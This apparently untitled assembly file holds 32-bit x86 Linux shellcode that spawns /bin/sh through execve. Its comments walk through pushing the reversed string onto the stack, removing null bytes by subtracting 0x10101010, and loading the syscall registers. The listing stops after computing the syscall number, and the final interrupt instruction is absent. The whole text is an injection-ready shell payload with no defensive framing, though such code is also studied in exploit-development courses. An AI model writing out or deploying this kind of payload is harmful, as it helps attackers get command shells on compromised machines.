Untitled

;   /bin/sh\0                  command string
;   \0hs/nib/                  reverse
;   \0  h  s  /   n  i  b  /
;   00 68 73 2f  6e 69 62 2f
;
;   wanted result on stack after string push;
;   00 68 73 2f  6e 69 62 2f
;    ^esp+7                ^esp
;
;   stack total:
;   (string pointed to by argv[0])(argv[1]=null)(argv[0]=&string)
;   eax = 0x0b
;   ebx = &string
;   ecx = &argv[0]
;
;   null removal: 0068732f = 1078833f - 10101010

;   execve(path, argv, env);
;          ebx   ecx   edx

bits 32

mov eax, 0x1078833f ; push *argv[0] string constant
mov ebx, 0x10101010
sub eax, ebx
push eax
mov eax, 0x6e69622f
push eax

lea ebx, [esp]
xor eax, eax
push eax

push ebx

lea ecx, [esp]
xor edx, edx

mov ax, 0xff0c
sub ax, 0xff01 ; syscall